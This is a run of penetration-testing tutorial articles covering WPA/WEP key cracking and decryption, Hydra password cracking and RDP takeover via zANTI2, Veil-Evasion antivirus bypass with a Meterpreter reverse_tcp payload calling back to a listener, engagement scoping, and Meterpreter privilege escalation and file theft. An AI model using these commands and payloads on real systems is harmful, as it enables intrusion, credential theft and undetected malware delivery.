In order to use these PMKs with aircrack-ng, we need to use a tool called airolib-ng. We will give it the options airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless-Lab, where PMK-Aircrack is the aircrack-ng-compatible database to be created and PMK-Wireless-Lab is the genpmk-compliant PMK database that we created previously.

We now feed this database to aircrack-ng and the cracking process speeds up remarkably. We use the following command:

aircrack-ng -r PMK-Aircrack WPACrackingDemo2-01.cap

There are additional tools available on BackTrack, such as Pyrit, that can leverage multi-CPU systems to speed up cracking. We give the pcap filename with the -r option and the genpmk-compliant PMK file with the -i option. Even on the same system used with the previous tools, Pyrit takes around 3 seconds to crack the key, using the same PMK file created using genpmk.

What just happened?

We looked at various different tools and techniques to speed up WPA/WPA2-PSK cracking. The whole idea is to pre-calculate the PMK for a given SSID and a list of passphrases in our dictionary.

Decrypting WEP and WPA packets

In all the exercises we have done till now, we cracked the WEP and WPA keys using various techniques. What do we do with this information? The first step is to decrypt the data packets we have captured using these keys. In the next exercise, we will decrypt the WEP and WPA packets in the same trace file that we captured over the air, using the keys we cracked.

Time for action – decrypting WEP and WPA packets

We can proceed with the following steps:

We will decrypt packets from the WEP capture file we created earlier: WEPCrackingDemo-01.cap. For this, we will use another tool in the aircrack-ng suite called airdecap-ng. We will run the following command, as shown in the following screenshot, using the WEP key we cracked previously:

airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-02.cap

The decrypted packets are stored in a file named WEPCrackingDemo-02-dec.cap. We use the tshark utility to view the first ten packets in the file.
Please note that you may see something different based on what you captured.

WPA/WPA2 PSK will work in exactly the same way as with WEP, using the airdecap-ng utility, as shown in the following screenshot, with the following command:

airdecap-ng -p abcdefgh WPACrackingDemo-02.cap -e "Wireless Lab"

What just happened?

We just saw how we can decrypt WEP and WPA/WPA2-PSK encrypted packets using airdecap-ng. It is interesting to note that we can do the same using Wireshark. We would encourage you to explore how this can be done by consulting the Wireshark documentation.

Connecting to WEP and WPA networks

We can also connect to the authorized network after we have cracked the network key. This can come in handy during penetration testing. Logging onto the authorized network with the cracked key is the ultimate proof you can provide to your client that his network is insecure.

Time for action – connecting to a WEP network

We can proceed with the following steps:

Use the iwconfig utility to connect to a WEP network, once you have the key. In a past exercise, we broke the WEP key—abcdefabcdefabcdefabcdef12.

What just happened?

We saw how to connect to a WEP network.

Time for action – connecting to a WPA network

We can proceed with the following steps:

In the case of WPA, the matter is a bit more complicated. The iwconfig utility cannot be used with WPA/WPA2 Personal and Enterprise, as it does not support these modes. We will use a new tool called wpa_supplicant for this lab. To use wpa_supplicant for a network, we will need to create a configuration file, as shown in the following screenshot. We will name this file wpa-supp.conf.

We will then invoke the wpa_supplicant utility with the following options: -D wext -i wlan0 -c wpa-supp.conf to connect to the WPA network we just cracked. Once the connection is successful, wpa_supplicant will give you the message: Connection to XXXX completed.

For both the WEP and WPA networks, once you are connected, you can use a DHCP client to grab an address from the network by typing dhclient3 wlan0.

What just happened?

The default Wi-Fi utility iwconfig cannot be used to connect to WPA/WPA2 networks. The de facto tool for this is wpa_supplicant. In this lab, we saw how we can use it to connect to a WPA network.

Summary

In this section, we learnt about WLAN encryption. WEP is flawed and, no matter what the WEP key is, with enough data packet samples it is always possible to crack WEP. WPA/WPA2 is cryptographically un-crackable currently; however, under special circumstances, such as when a weak passphrase is chosen in WPA/WPA2-PSK, it is possible to retrieve the passphrase using dictionary attacks.

Resources for Article:

Further resources on this subject:

Veil-Evasion [article]
Wireless and Mobile Hacks [article]
Social Engineering Attacks [article]

Features of CloudFlare

Packt
10 Sep 2013
5 min read
(For more resources related to this topic, see here.)

Top 5 features you need to know about

Here we will go over the various security, performance, and monitoring features CloudFlare has to offer.

Malicious traffic

Any website is susceptible to attacks from malicious traffic. Some attacks might try to take down a targeted website, while others may try to include their own spam. Worse attacks might even try to trick your users into providing information or compromise user accounts. CloudFlare has tools available to mitigate various types of attacks.

Distributed denial of service

A common attack on the Internet is the distributed denial-of-service (DDoS) attack. A denial-of-service attack involves producing so many requests for a service that it cannot fulfill them, and crumbles under the load. A common way this is done in practice is by having the attacker make a server request but never listen for the response. Typically, the client would send a response notifying the server that it received data; if a client does not acknowledge, the server will keep trying for quite a while. A single client could send thousands of these requests per second, but the server would not be able to handle many at once.

Another twist to these attacks is to distribute them: the attack is spread across many machines, making it difficult to tell where the requests are coming from. CloudFlare can help with this because it can monitor when users are trying an attack and reject access, or require a captcha challenge to gain access. It also monitors all of its customers for this, so if there is an attack happening on another CloudFlare site, it can protect yours from the traffic attacking that site as well.

It is a difficult problem to solve. Sometimes traffic just spikes when a big news article runs, and it is hard to tell when it's legitimate traffic and when it is an attack. For this, CloudFlare offers multiple levels of DoS protection. On the CloudFlare settings, the Security tab is where you can configure this advanced protection. The basic settings are rolled into the Basic protection level setting:

SQL injection

SQL injection is a more involved attack. On a web page, you may have a field like a username/password field. That field will probably be checked against a database for validity. The database queries to do this are simple text strings. This means that if the query is written in a way that doesn't explicitly prevent it, an attacker can start writing their own queries. A site that is not equipped to handle these cases would be susceptible to hackers destroying data, gaining access by pretending to be other users, or accessing data they otherwise would not have access to. It is a difficult problem to check against when building software. Even big companies have had issues.

CloudFlare mitigates this by looking for requests containing things that look like database queries. Almost no websites take in raw database commands as normal queries. This means that CloudFlare can search for suspicious traffic and prevent it from accessing your page.
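CloudFlare's filtering is a safety net, not a substitute for writing the query safely in the first place. As a rough illustration (not part of CloudFlare), here is the parameterized-query pattern using the placeholder style of the Node.js mysql driver; the table, field, and connection objects are invented for the example:

var userName = req.body.username; // assume this came from a login form

// vulnerable: user input is concatenated directly into the SQL string
var unsafe = "SELECT * FROM users WHERE name = '" + userName + "'";

// safer: the input is passed as a bound parameter, never as SQL text
connection.query(
  "SELECT * FROM users WHERE name = ?",
  [userName],
  function (err, rows) {
    if (err) { return console.error(err); }
    console.log(rows.length ? "user found" : "no such user");
  }
);

Because the value is bound rather than spliced into the query, anything the attacker types is treated as data, not as SQL.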
Cross-site scripting

Cross-site scripting is similar to SQL injection, except that it deals with JavaScript rather than SQL. If you have a site that has comments, for example, an unprotected site might allow a hacker to put their own JavaScript on it. Any other user of the site could then execute that JavaScript. They could do things like sniff for passwords, or even credit card information. CloudFlare prevents this in a similar fashion, by looking for requests that contain JavaScript and blocking them.

Open ports

Often, services on a server can be available without the sysadmin knowing about it. If Telnet is allowed, for example, an attacker could simply log in to the system and start checking out source code, looking into the database, or taking down the website. CloudFlare acts as a firewall to ensure that the ports are blocked even if the server has them open.

Challenge page

When CloudFlare receives a request from a suspect user, it will usually show a challenge page asking the user to fill out a captcha to access the site. The options for customizing these settings are on the Security Settings tab. You can also configure how that page looks by clicking on Customize. By default, it will look something like the following:

E-mail address obfuscation

E-mail address obfuscation scrambles any e-mail addresses on your page, then runs some JavaScript to decode them so that the text ends up being readable. This helps keep spam out of your users' inboxes, but the downside is that if a user has JavaScript disabled, they will not be able to read the e-mail addresses.

Summary

In this article, we have looked at the various security features provided by CloudFlare against malicious traffic, distributed denial of service, and so on, as well as features such as e-mail address obfuscation. Given this, CloudFlare is one of the better website protection services available in the market today.

Resources for Article:

Further resources on this subject:

Getting Started with RapidWeaver [Article]
LESS CSS Preprocessor [Article]
Translations in Drupal 6 [Article]

Connecting to Open Ports

Packt
31 Aug 2015
6 min read
Miroslav Vitula, the author of the book Learning zANTI2 for Android Pentesting, penned this article on connecting to open ports, focusing on cracking passwords and setting up a remote desktop connection. Let's delve into the topics. (For more resources related to this topic, see here.)

Cracking passwords

THC Hydra is one of the best-known login crackers; it supports numerous protocols, is flexible, and is very fast. Hydra supports more than 30 protocols, including HTTP GET, HTTP HEAD, Oracle, pcAnywhere, rlogin, Telnet, SSH (v1 and v2 as well), and many, many more.

As you might guess, THC Hydra is also implemented in zANTI2, and it has become an integral part of the app thanks to its functionality and usability. The zANTI2 developers named this section Password Complexity Audit and it is located under Attack Actions after a target is selected.

After selecting this option, you've probably noticed there are several types of attack. First, there are multiple dictionaries: Small, Optimized, Big, and a Huge dictionary that contains the highest number of usernames and passwords. To clarify, a dictionary attack is a method of breaking into a password-protected computer, service, or server by entering every word in a dictionary file as a username/password. Unlike a brute force attack, where any possible combination is tried, a dictionary attack uses only those possibilities that are deemed most likely to succeed. Files used for dictionary attacks (also called wordlists) can be found anywhere on the Internet, from basic ones to huge ones containing more than 900,000,000 words for WPA2 WiFi cracking. zANTI2 also lets you use a custom wordlist for the attack.

Apart from dictionary attacks, there is an Incremental option, which is used for brute force attacks. This attempts to guess the right combination using a custom range of letters/numbers.

To set up the method properly, ensure the cracking options are correctly set. The area of searched combinations is defined by min-max charset, where min stands for the minimum length of the password, max for the maximum length, and charset for the character set, which in our case will be defined as lowercase letters.

The Automatic Mode, as the description says, automatically matches the list of protocols with the open ports on the target. To select a custom protocol manually, simply disable the Automatic Mode and select the protocol you want to perform the attack on. In our case that would be the SSH protocol, for cracking a password used to establish the connection on port 22.

Since incremental is a brute force method, it might take an extremely long time to find the right combination. For instance, the password zANTI2-hacks would take about 350 thousand years for a desktop PC to crack: with a 77-character set and a 12-character password, there are about 43 sextillion possible combinations. Therefore, it is generally better to use dictionary attacks for cracking passwords that might be longer than just a few characters. However, if you have a few thousand years to spare, feel free to use the brute force method.

If everything went fine, you should now be able to view the access password with the username. You can easily connect to the target by tapping the finished result using one of the installed SSH clients. When connected, it's all yours. All Linux commands can be executed using the app and you now have the power to list directories, change the password, and more.

Although connecting to port 22 might sound spicy, there is more to be discovered.
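To see where an estimate like this comes from, here is a rough back-of-the-envelope calculation. The guess rate used is an assumption chosen only so that the result lines up with the figure quoted above; real cracking speeds vary enormously with the protocol and hardware:

// brute-force keyspace for a 12-character password drawn from a 77-character set
const combinations = 77n ** 12n;         // about 4.3 x 10^22, roughly 43 sextillion

// assumed offline guess rate (roughly what the estimate above implies)
const guessesPerSecond = 4e9;
const years = Number(combinations) / guessesPerSecond / (3600 * 24 * 365);

console.log(combinations.toString());
console.log(Math.round(years) + " years"); // on the order of 350,000 years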
A remote desktop connection

Microsoft has made a handy feature called remote desktop. As the title suggests, this lets an ordinary user access his home computer when he is away, or it can be used for managing a server through a network. For us, this means we can exploit an open port to set up a remote desktop connection between our mobile phone and a target.

There is, however, one requirement. Since the RDP (Remote Desktop Protocol) port 3389 isn't open by default, a user has to allow connections from other computers. This option can be set in the control panel of Windows, and only then is port 3389 accessible. If the option Allow remote connections to this computer is ticked on the victim's machine, we're good to go. This will leave port 3389 open and listening for incoming connections, including the ones from malicious attackers.

If we run a quick port discovery on the target, the remote desktop port with number 3389 will pop up. This is a good sign for us, indicating that this port is open and listening.

Tap the port (ms-wbt-server). You will be asked for login credentials once again. Tap GO. Now, if you haven't got any remote desktop clients installed, zANTI2 will redirect you to Google Play to download one—the Parallels 2X RDP. This application, as you can tell, is capable of establishing remote desktop access from your Android device. It is stable, fast, and works very well.

After downloading the application, go back to zANTI2 and connect to the port once again. You will now be redirected directly to the app and a connection will be established immediately. As you can see in the following screenshot, here's my computer—I'm currently working on the article!

Apart from a simplified Windows user interface (using a basic XP look with no transparent bars and such), it is basically the same and you can take control over the whole system. The Parallels 2X RDP client offers a comfortable and easy way to move the mouse and use the keyboard. However, unlike connecting to port 445, where a victim has no idea about an intruder accessing the files on his computer, connecting to this port will log the current user out of the current session. That said, if the remote desktop is set to allow multiple sessions at once, it is possible for the victim to see what the attacker currently controls.

The quality seems to be good, although the resolution is only 804 x 496 pixels with 32-bit color depth. Despite these conditions, it is still easy to access folders, view files, or open applications.

As we can see in the practical demonstration, service ports should be accessible only by authorized systems, not by anyone else. It is also a good reminder to secure the login credentials on your machine to protect yourself not only from people behind your back but mainly from people on the network.

Summary

In this article, we showed how a connection to these ports is established, how to crack password-protected ports, and how to access them afterwards using tools like ConnectBot or the remote desktop client.

Resources for Article:

Further resources on this subject:

Saying Hello to Unity and Android [article]
Speeding up Gradle builds for Android [article]
Android and UDOO for Home Automation [article]

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.)

A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), now provides effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management.

As a framework, Veil-Evasion possesses several features, which include the following:

It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python
It can use Metasploit-generated shellcode
It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory
The Veil-Evasion_evasion.cna script allows Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike
Payloads can be generated and seamlessly substituted into all PsExec calls
Users have the ability to reuse shellcode or implement their own encryption methods
Its functionality can be scripted to automate deployment
Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system)

Veil-Evasion can generate an exploit payload; the standalone payloads include the following options:

Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity.
Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor.
PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

Upload and execute using Impacket and the PTH toolkit
UNC invocation

Veil-Evasion is available from the Kali repositories and is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script.

Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot:

Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot:

To obtain information on a specific payload, type info <payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload:

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack.
The required options include the names of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of \x01\x02, without quotes and newlines (\n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot:

In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot:

The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot:

The final screen displays information on the generated payload, as shown in the following screenshot:

The exploit could also have been created directly from a command line using the following options:

kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!"

Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:

Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software.

To use the payload with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the victim launches it, it will establish a reverse shell back to the attacker's system.
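The idea behind checkvt is easy to illustrate. The following is a rough sketch, not the actual checkvt script, showing how the same kind of SHA1 fingerprint can be computed locally for a generated payload; the file path is a placeholder:

const crypto = require('crypto');
const fs = require('fs');

// placeholder path to a generated payload file
const payloadPath = '/root/veil-output/compiled/payload.exe';

// compute the SHA1 fingerprint of the file, the same value stored in hashes.txt
const sha1 = crypto.createHash('sha1')
  .update(fs.readFileSync(payloadPath))
  .digest('hex');

console.log(sha1);
// only this hash is looked up against VirusTotal's database,
// so the payload binary itself is never uploaded to a scanner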
Summary

Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection.

Resources for Article:

Further resources on this subject:

Kali Linux – Wireless Attacks [Article]
Web app penetration testing in Kali [Article]
Customizing a Linux kernel [Article]

BackTrack 4: Target scoping

Packt
15 Apr 2011
9 min read
What is target scoping?

Target scoping is defined as an empirical process for gathering target assessment requirements and characterizing each of its parameters to generate a test plan, limitations, business objectives, and time schedule. This process plays an important role in defining clear objectives for any kind of security assessment. By determining these key objectives, one can easily draw a practical roadmap of what will be tested, how it should be tested, what resources will be allocated, what limitations will be applied, what business objectives will be achieved, and how the test project will be planned and scheduled. Thus, we have combined all of these elements and presented them in a formalized scope process to achieve the required goal.

Following are the key concepts that will be discussed in this article:

Gathering client requirements deals with accumulating information about the target environment through verbal or written communication.
Preparing the test plan depends on different sets of variables. These may include shaping the actual requirements into a structured testing process, legal agreements, cost analysis, and resource allocation.
Profiling test boundaries determines the limitations associated with the penetration testing assignment. These can be a limitation of technology, knowledge, or a formal restriction on the client's IT environment.
Defining business objectives is a process of aligning the business view with the technical objectives of the penetration testing program.
Project management and scheduling directs every other step of the penetration testing process with a proper timeline for test execution. This can be achieved by using a number of advanced project management tools.

It is highly recommended to follow the scope process in order to ensure test consistency and a greater probability of success. Additionally, this process can also be adjusted according to the given situation and test factors. Without any such process, there will be a greater chance of failure, as the requirements gathered will have no proper definitions and procedures to follow. This can lead the whole penetration testing project into danger and may result in unexpected business interruption. Paying special attention at this stage to the penetration testing process will make an excellent contribution towards the rest of the test phases and clarify the perspectives of both technical and management areas. The key is to acquire as much information beforehand as possible from the client to formulate a strategic path that reflects multiple aspects of penetration testing. These may include negotiable legal terms, contractual agreement, resource allocation, test limitations, core competencies, infrastructure information, timescales, and rules of engagement.

As a part of best practices, the scope process addresses each of the attributes necessary to kickstart our penetration testing project in a professional manner. As we can see in the preceding screenshot, each step constitutes unique information that is aligned in a logical order to pursue the test execution successfully. Remember, the more information that is gathered and managed properly, the easier it will be for both the client and the penetration testing consultant to understand the process of testing. This also allows any legal matters to be resolved at an early stage. Hence, we will explain each of these steps in more detail in the following section.
Gathering client requirements

This step provides a generic guideline that can be drawn up in the form of a questionnaire to elicit all the information about the target infrastructure from a client. A client can be any subject who is legally and commercially bound to the target organization. As such, it is critical for the success of the penetration testing project to identify all internal and external stakeholders at an early stage of the project and analyze their levels of interest, expectations, importance, and influence. A strategy can then be developed for approaching each stakeholder with their requirements and involvement in the penetration testing project to maximize positive influences and mitigate potential negative impacts.

It is solely the duty of the penetration tester to verify the identity of the contracting party before taking any further steps.

The basic purpose of gathering client requirements is to open a true and authentic channel by which the pentester can obtain any information that may be necessary for the testing process. Once the test requirements have been identified, they should be validated by the client in order to remove any misleading information. This will ensure that the developed test plan is consistent and complete.

We have listed some of the commonly asked questions that can be used in a conventional customer requirements form and the deliverables assessment form. It is important to note that this list can be extended or shortened according to the goal of the client, and that the client must retain enough knowledge about the target environment.

Customer requirements form

Collect the company's information, such as company name, address, website, contact person details, e-mail address, and telephone number.
What are your key objectives behind the penetration testing project?
Determine the penetration test type (with or without specific criteria):
  Black-box testing or external testing
  White-box testing or internal testing
  Informed testing
  Uninformed testing
  Social engineering included
  Social engineering excluded
  Investigate employees' background information
  Adopt an employee's fake identity
  Denial of Service included
  Denial of Service excluded
  Penetrate business partner systems
How many servers, workstations, and network devices need to be tested?
What operating system technologies are supported by your infrastructure?
Which network devices need to be tested? Firewalls, routers, switches, modems, load balancers, IDS, IPS, or any other appliance?
Is there any disaster recovery plan in place? If yes, who is managing it?
Are there any security administrators currently managing your network?
Is there any specific requirement to comply with industry standards? If yes, please list them.
Who will be the point of contact for this project?
What is the timeline allocated for this project? In weeks or days.
What is your budget for this project?
List any other requirements as necessary.

Deliverables assessment form

What types of reports are expected?
  Executive reports
  Technical assessment reports
  Developer reports
In which format do you want the report to be delivered? PDF, HTML, or DOC.
How should the report be submitted? E-mail or printed.
Who is responsible for receiving these reports?
  Employee
  Shareholder
  Stakeholder

By using such a concise and comprehensive inquiry form, you can easily extract the customer requirements and shape the test plan accordingly.
Preparing the test plan

Once the requirements have been gathered and verified by the client, it is time to draw up a formal test plan that reflects all of these requirements, in addition to other necessary information on the legal and commercial grounds of the testing process. The key variables involved in preparing a test plan are a structured testing process, resource allocation, cost analysis, a non-disclosure agreement, a penetration testing contract, and rules of engagement. Each of these areas is addressed with a short description below:

- Structured testing process: After analyzing the details provided by our customer, it may be important to restructure the BackTrack testing methodology. For instance, if the social engineering service was excluded, we would have to remove it from our formal testing process. This practice is sometimes known as test process validation. It is a repetitive task that has to be revisited whenever there is a change in client requirements. If there are any unnecessary steps involved during the test execution, it may result in a violation of the organization's policies and incur serious penalties. Additionally, the test type drives a number of changes to the test process. For example, white-box testing does not require the information gathering and target discovery phases, because the auditor is already aware of the internal infrastructure.
- Resource allocation: Determining the expertise required to achieve completeness of a test is one of the substantial areas of planning. Assigning a skilled penetration tester to a certain task results in a better security assessment. For instance, application penetration testing requires a dedicated application security tester. This activity plays a significant role in the success of a penetration testing assignment.
- Cost analysis: The cost of penetration testing depends on several factors. These may involve the number of days allocated to fulfill the scope of a project, additional service requirements such as social engineering and physical security assessment, and the expertise required to assess the specific technology. From an industry viewpoint, this should combine qualitative and quantitative values.
- Non-disclosure agreement (NDA): Before starting the test process, it is necessary to sign an agreement that reflects the interests of both parties, the client and the penetration tester. Such a mutual non-disclosure agreement should set out the terms and conditions under which the test will be conducted. It is important for the penetration tester to comply with these terms throughout the test process. Violating any single term of the agreement can result in serious penalties or permanent exclusion from the job.
- Penetration testing contract: There is always a need for a legal contract that reflects all the technical matters between the client and the penetration tester. This is where the penetration testing contract comes in. The basic information inside such contracts focuses on what testing services are being offered, what their main objectives are, how they will be conducted, payment declarations, and maintaining the confidentiality of the whole project.
- Rules of engagement: The process of penetration testing can be invasive and requires a clear understanding of what the assessment demands, what support will be provided by the client, and what type of potential impact or effect each assessment technique may have.
Moreover, the tools used in the penetration testing process should clearly state their purpose so that the tester can use them accordingly. The rules of engagement define all of these statements in a more detailed fashion to address the technical criteria that should be followed during the test execution. By preparing each of these subparts of the test plan, you can ensure a consistent view of the penetration testing process. This will provide the penetration tester with more specific assessment details that have been processed from the client requirements. It is always recommended to prepare a test plan checklist that can be used to verify the assessment criteria and its underlying terms with the contracting party.

So, what is Metasploit?

Packt
06 Aug 2013
9 min read
(For more resources related to this topic, see here.)

In the IT industry, we have various flavors of operating systems, ranging from Mac, Windows, and *nix platforms to other server operating systems, which run any number of services depending on the needs of the organization. When given the task of assessing the risk factor of an organization, it becomes very tedious to run single code snippets against these systems. What if, due to some hardware failure, all these code snippets are lost? Enter Metasploit.

Metasploit is an exploit development framework started by H. D. Moore in 2003, which was later acquired by Rapid7. It is basically a tool for the development of exploits and the testing of these exploits on live targets. The framework is written entirely in Ruby and is currently one of the largest frameworks written in the Ruby language. The tool houses more than 800 exploits in its repository and hundreds of payloads for each exploit. It also contains various encoders, which help us in the obfuscation of exploits to evade antivirus and other intrusion detection systems (IDS). As we progress in this book, we shall uncover more and more features of this tool. It can be used for penetration testing, risk assessment, vulnerability research, and other security development practices such as IDS and intrusion prevention system (IPS) development.

Top features you need to know about

After learning about the basics of the Metasploit framework, in this article we will find out the top features of Metasploit and learn some of the attack scenarios. This article covers the following features:

- The meterpreter module
- Using auxiliary modules in Metasploit
- Client-side attacks with auxiliary modules

The meterpreter module

In the earlier article, we saw how to open up a meterpreter session in Metasploit. In this article, we shall see the features of the meterpreter module and its command set in detail. Before we look at a working example, let's see why meterpreter is used in exploitation:

- It doesn't create a new process on the target system
- It runs in the context of the process that is being exploited
- It performs multiple tasks in one go; that is, you don't have to create separate requests for each individual task
- It supports writing scripts

Let's check out what the meterpreter shell looks like. Meterpreter allows you to provide commands and obtain results. The list of commands available under meterpreter can be obtained by typing help in the meterpreter command shell. The syntax for this command is as follows:

meterpreter> help

The following screenshot represents the core commands:

The filesystem commands are as follows:

The networking commands are as follows:

The system commands are as follows:

The user interface commands are as follows:

The other miscellaneous commands are as follows:

As you can see in the preceding screenshots, meterpreter has two command sets apart from its core set of commands. They are as follows:

- Stdapi
- Priv

The stdapi command set contains the filesystem, networking, system, and user-interface commands. Depending on the exploit, if it can obtain higher privileges, the priv command set is loaded. By default, the stdapi and core command sets are loaded irrespective of the privilege level an exploit gets. Let's check out the route command from the meterpreter stdapi command set.
The syntax is as follows:

meterpreter> route [-h] command [args]

In the following screenshot, we can see the list of all the routes on the target machine:

In a scenario where we wish to add other subnets and gateways, we can use the concept of pivoting, where we add a couple of routes for optimizing the attack. The following subcommands are supported by route:

- add [subnet] [netmask] [gateway]
- delete [subnet] [netmask] [gateway]
- list

Another command that helps during pivoting is port forwarding. Meterpreter supports port forwarding via the following command. The syntax for this command is as follows:

meterpreter> portfwd [-h] [add/delete/list] [args]

As soon as attackers break into a system, the first thing they do is check what privilege level they have on the system. Meterpreter provides a command for working out the privilege level after breaking into the system. The syntax for this command is as follows:

meterpreter> getuid

The following screenshot demonstrates the working of getuid in meterpreter. In the screenshot, the attacker is accessing the system with the SYSTEM privilege. In a Windows environment, the SYSTEM privilege is the highest privilege available.

Suppose we failed to get access to the system as the SYSTEM user, but succeeded in getting access as an administrator; meterpreter then provides several ways to elevate your access level. This is called privilege escalation. The commands are as follows:

Syntax: meterpreter> getsystem
Syntax: meterpreter> migrate process_id
Syntax: meterpreter> steal_token process_id

The first method uses an internal procedure within meterpreter to gain SYSTEM access, whereas in the second method, we migrate to a process that is running with the SYSTEM privilege. By default, the exploit gets loaded into some process space of the Windows operating system, but there is always a possibility that the user clears that process space by killing the process from the process manager. In a case like this, it's wise to migrate to a process that is usually untouched by the user. This helps in maintaining prolonged access to the victim machine. In the third method, we impersonate a process that is running as a SYSTEM-privileged process. This is called impersonation via token stealing. Windows assigns each user a unique ID called a security identifier (SID). Each thread holds a token containing information about its privilege level. Impersonating a token happens when one particular thread temporarily assumes the identity of another process on the same system.

We have seen the usage of process IDs in the preceding commands, but how do we fetch the process ID? That is exactly what we shall be covering next. Windows runs various processes, and the exploit itself will be running in the process space of the Windows system. To list all these processes with their PIDs and privilege levels, we use the following meterpreter command:

meterpreter> ps

The following screenshot gives a clear picture of the ps command:

In the preceding screenshot, we have the PIDs listed. We can use these PIDs to escalate our privileges; a small helper for shortlisting SYSTEM-owned PIDs from a saved listing is sketched after this section. Once you steal a token, it can be dropped using the drop_token command. The syntax for this command is as follows:

meterpreter> drop_token
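When the ps listing contains dozens of entries, picking a migration target by eye is error-prone. The following is a small, illustrative Python helper (not a Metasploit feature) that filters a saved copy of the ps output, for example copied from the console into a file called processes.txt, and shortlists processes owned by NT AUTHORITY\SYSTEM. The file name, the preferred process names, and the assumption that each data line starts with the PID and PPID columns are all placeholders for illustration.

import re

# Common, usually long-lived SYSTEM processes; an illustrative list, not authoritative.
PREFERRED = {"winlogon.exe", "lsass.exe", "services.exe", "spoolsv.exe"}

def system_pids(ps_dump: str):
    # Yield (pid, name) pairs for SYSTEM-owned processes in a saved ps listing.
    # Assumes each data line starts with numeric PID and PPID columns followed
    # by the process name, and that SYSTEM-owned lines contain 'NT AUTHORITY\SYSTEM'.
    for line in ps_dump.splitlines():
        if "NT AUTHORITY\\SYSTEM" not in line:
            continue
        match = re.match(r"\s*(\d+)\s+\d+\s+(\S+)", line)
        if match:
            yield int(match.group(1)), match.group(2)

if __name__ == "__main__":
    with open("processes.txt") as handle:   # hypothetical saved 'ps' output
        listing = handle.read()
    for pid, name in system_pids(listing):
        marker = "  <- common migrate target" if name.lower() in PREFERRED else ""
        print(f"{pid:>6}  {name}{marker}")

The shortlisted PID can then be fed to migrate or steal_token as shown above.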
Another interesting command from the stdapi set is the shell command. This spawns a shell on the target system and enables us to navigate through the system effortlessly. The syntax for this command is as follows:

meterpreter> shell

The following screenshot shows the usage of the shell command:

The preceding screenshot shows that we are inside the target system. All the usual Windows command shell commands such as dir, cd, and md work here. After briefly covering the system commands, let's start learning the filesystem commands. A filesystem has a working directory. To find out the current working directory on the target system, we use the following command:

meterpreter> pwd

The following screenshot shows the command in action:

Suppose you wish to search for different files on the target system; we can use a command called search. The syntax for this command is as follows:

meterpreter> search [-d dir] [-r recurse] -f pattern

The options available under the search command are:

- -d: The directory in which to begin the search. If nothing is specified, all drives are searched.
- -f: The pattern we would like to search for, for example, *.pdf.
- -h: Provides the help context.
- -r: Used when we need to recursively search the subdirectories. By default, this is set to true.

Once we find the file we need, we use the download command to download it to our drive. The syntax for this command is as follows:

meterpreter> download full_relative_path

